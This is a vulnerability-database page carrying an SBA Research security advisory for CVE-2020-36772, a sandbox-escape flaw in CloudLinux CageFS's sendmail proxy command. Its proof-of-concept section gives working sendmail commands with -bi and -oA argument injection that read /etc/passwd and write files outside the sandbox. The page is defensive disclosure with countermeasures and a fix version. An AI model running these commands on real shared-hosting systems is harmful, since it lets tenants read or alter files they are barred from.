Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDavid Gnedt, sba-research.orgPACKETSTORM:176791
HistoryJan 26, 2024 - 12:00 a.m.

CloudLinux CageFS 7.0.8-2 Insufficiently Restricted Proxy Command

2024-01-2600:00:00
David Gnedt, sba-research.org
packetstormsecurity.com
183
cloudlinux cagefs vulnerability
proxy command
file restriction
local user
arbitrary files

AI Score

7.4

Confidence

Low

EPSS

0

Percentile

5.1%

JSON
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256  
  
# CloudLinux CageFS Insufficiently Restricted Proxy Command #  
  
Link: https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-02_CloudLinux_CageFS_Insufficiently_Restricted_Proxy_Commands  
  
## Vulnerability Overview ##  
  
CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths  
supplied to the `sendmail` proxy command. This allows local users to read  
and write arbitrary files of certain file formats outside the CageFS  
environment.  
  
* **Identifier** : SBA-ADV-20200707-02  
* **Type of Vulnerability** : External Control of File Name or Path  
* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)  
* **Vendor** : CloudLinux Inc.  
* **Affected Versions** : <= 7.0.8-2  
* **Fixed in Version** : 7.1.1-1  
* **CVE ID** : CVE-2020-36772  
* **CVSS Vector** : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L  
* **CVSS Base Score** : 6.6 (Medium)  
  
## Vendor Description ##  
  
> CloudLinux OS is the leading platform for multitenancy. It improves  
> server stability, density, and security by isolating each tenant and  
> giving them allocated server resources. This creates an environment  
> that feels more like a virtual server than a shared hosting account.  
> By doing so, CloudLinux OS reduces operating costs and churn rates,  
> and increases profitability.  
  
Source: <https://www.cloudlinux.com/>  
  
## Impact ##  
  
A CageFS-restricted local user can read and write arbitrary files of certain  
file formats outside the CageFS environment by exploiting the vulnerability  
documented in this advisory.  
  
## Vulnerability Description ##  
  
CloudLinux offers a feature called proxy commands in CageFS environments.  
It allows limited execution of commands outside the CageFS environment from  
a user restricted within the CageFS environment.  
  
CageFS allows in its default configuration to execute `sendmail` as a proxy  
command outside the CageFS environment. This default configuration is  
designed to allow local programs sending emails by invoking `sendmail`.  
Due to the insufficient validation of sendmail's arguments an attacker can  
invoke other sendmail functionality as well. While CageFS applies some  
restrictions to the allowed arguments it does not restrict or validate the  
`-bi` and `-oA` arguments.  
  
Therefore, an attacker can have `sendmail` access arbitrary files which will  
be interpreted as alias database files by enabling the `newalias` mode of  
`sendmail` with `-bi` and specifying a file located outside the CageFS  
environment with `-oA`.  
  
On systems using the Postfix to Sendmail compatibility interface, a great  
number of different alias database types can be used to craft exploits.  
The compatibility interface internally calls `postalias` and besides the  
`-oA` argument already being dangerous by itself, it also suffers from an  
argument injection issue, which allows injection of additional Postfix  
specific arguments for `postalias`. However, this is not a security issue  
in Postfix.  
  
According to Postfix developers, Postfix's `sendmail` does not enforce a  
security policy on command-line arguments. Instead, it relies on the  
UNIX/Linux system to enforce access policies based on the effective user and  
group IDs of the process. If a security policy should be enforced, the  
calling process must sanitize the command-line arguments before they are  
given to `sendmail`. This includes but is not limited to sanity checks on  
pathnames, and if applicable sanity checks on file contents in a way that  
is not vulnerable to time-of-check to time-of-use race attacks, and  
disabling options processing with `--`.  
  
## Proof of Concept ##  
  
For example, an attacker can read arbitrary files that at least partially  
follow the structure `key <whitespace> value` via the lookup table type  
`texthash`:  
  
```sh  
$ sendmail -bi -oA'-s,-f,texthash:/etc/passwd'  
postalias: warning: /etc/passwd, line 1: expected format: key whitespace value -- ignoring this line  
[...]  
postalias: warning: /etc/passwd, line 211: expected format: key whitespace value -- ignoring this line  
sssd:x:496:493:User: for sssd:/:/sbin/nologin  
dbus:x:81:81:System: message bus:/:/sbin/nologin  
polkitd:x:497:495:User: for polkitd:/:/sbin/nologin  
tss:x:59:59:Account: used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin  
systemd-resolve:x:193:193:systemd: Resolver:/:/sbin/nologin  
rngd:x:494:491:Random: Number Generator Daemon:/var/lib/rngd:/sbin/nologin  
sshd:x:74:74:Privilege-separated: SSH:/var/empty/sshd:/sbin/nologin  
systemd-coredump:x:499:497:systemd: Core Dumper:/:/sbin/nologin  
nobody:x:65534:65534:Kernel: Overflow User:/:/sbin/nologin  
ftp:x:14:50:FTP: User:/var/ftp:/sbin/nologin  
unbound:x:498:496:Unbound: DNS resolver:/etc/unbound:/sbin/nologin  
nrpe:x:492:486:NRPE: user for the NRPE service:/var/run/nrpe:/sbin/nologin  
```  
  
The attacker can also use other lookup table types which might disclose  
sensitive information. For example, `unix` allows the query of specific  
users regardless of the format:  
  
```sh  
$ sendmail -bi -oA'-q,ftp2406151,unix:passwd.byname'  
ftp2406151:x:935:935::/home/ftp2406151:/sbin/nologin  
```  
  
An attacker can also write specific file formats outside the CageFS  
environment. For example, with the `hash` lookup table type:  
  
```sh  
$ echo sba:was_here | sendmail -bi -oA'-o,-p,-i,-f,hash:/tmp/sba_was_here'  
$ sendmail -bi -oA'-s,-f,hash:/tmp/sba_was_here'  
@: @  
YP_LAST_MODIFIED: 1594138203  
YP_MASTER_NAME: localhost  
sba: was_here  
```  
  
## Recommended Countermeasures ##  
  
We recommend to restrict the `sendmail` command to only strictly required  
parameters using an allow list approach. At least the following parameters  
are known to cause dangerous behavior:  
  
* `-oA`: Allows specification of multiple paths and additional arguments.  
It is important to consider that it is directly followed by the pathname  
without a separator, i.e., `-oA/etc/passwd`.  
* `-bi`: Enables the `newalias` mode of `sendmail`.  
* `-I`: Enables the `newalias` mode of `sendmail`.  
* `-v`: If the parameter is added at least two times, i.e., `-vv`,  
`-vvvvv` or `-v -v`, it enables the verbose mode, which leaks the  
Postfix configuration in some cases.  
  
We did not fully analyze other parameters of `sendmail`, therefore, it is  
possible that `sendmail` as proxy command is also prone to other attacks.  
  
## Timeline ##  
  
* `2020-07-07`: identification of vulnerability in version 7.0.6-1  
* `2020-07-10`: initial vendor contact  
* `2020-07-13`: initial vendor response  
* `2020-07-13`: disclosed vulnerability to vendor security contact  
* `2020-08-06`: vendor released version 7.1.1-1 to testing  
* `2020-09-03`: vendor released version 7.1.1-1 to production  
* `2020-10-02`: request CVE from MITRE  
* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat  
* `2024-01-19`: request CVE from Red Hat  
* `2024-01-22`: Red Hat assigned CVE-2020-36772  
* `2024-01-25`: public disclosure  
  
## References ##  
  
* CageFS 7.1.1-1 beta: <https://blog.cloudlinux.com/beta-cagefs-and-alt-python27-cllib-updated-1>  
* CageFS 7.1.1-1 production: <https://blog.cloudlinux.com/lve-manager-lve-stats-lve-utils-and-alt-python27-cllib-have-been-rolled-out-to-100>  
  
## Credits ##  
  
* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWyn0kACgkQ+7iGL1j3  
dbL5PhAAspmKHEa29DXuwNjJ/3l96fX2AiuPj5NDhoSF01tfakpNE0w86c8GiGvw  
GRhGQ0n1AO9qNcfyULjWjtQ8FwFuRPzPI0mfaycW2oDQ3BAG2LtFqmQvpUzTV6tP  
pckL2H50ptablRYlphFEY0XDt42ezU3wjokNK/cpRhZlzCs7mvd6LuCg5qXwBno/  
srsxlb4n1IdZRF5mh7ariYpObDvLUctwhri7RCBEqb6MZh+y6rSSPKsGdCHq/su2  
6KEH0mxNPwMJtccNah29SWvv+fZ9+mkK1IuuWIdhyM2XMTJxOE4n0AsoISVGI6bH  
9XgL0AQ3B3kyoqHbfCyoUonbz4mSdTFInqpuqlU0X6Wos+kjnS/27sH/De8ba+mm  
jmDDQFmoe1QrVkbDjXI7zBy81Qh3nVZ/qig/1SCex0i+IyO4HpdCYbjrs7I76C0V  
fvpd0VWb3BKpGHA4IhISA/jmCSlvxW+2gkHrhxfWhM1K3Pa/a0qH9RuCFAZ7B9qP  
OQM3Yrhbikqyaqh/ZI7nYMc33KfiPCiXKejDtaTGIVVThKHr1mQibgaYt+ILi0RH  
8uxH+tpuVqjEgVHZQMBQEAa3WvaGYo2kJJxU0z+3m/s6W45JhGguMzrH/n9z6XKo  
H4xyTp1YQ3aP6gZBgoMEkipkc0B+QK/zb+xOghfE3Cbjdx47gCo=  
=E60q  
-----END PGP SIGNATURE-----  
  
`

Related

nvd 1
cvelist 1
prion 1
cve 1
zdt 1
nvd
nvd
CVE-2020-36772
2024-01-22 15:15:07
cvelist
cvelist
CVE-2020-36772
2024-01-22 14:11:25
prion
prion
Command injection
2024-01-22 15:15:00
cve
cve
CVE-2020-36772
2024-01-22 15:15:07
zdt
zdt
CloudLinux CageFS 7.0.8-2 Insufficiently Restricted Proxy Command Vulnerability
2024-01-29 00:00:00

AI Score

7.4

Confidence

Low

EPSS

0

Percentile

5.1%

JSON
Related for PACKETSTORM:176791
nvd1cvelist1prion1cve1zdt1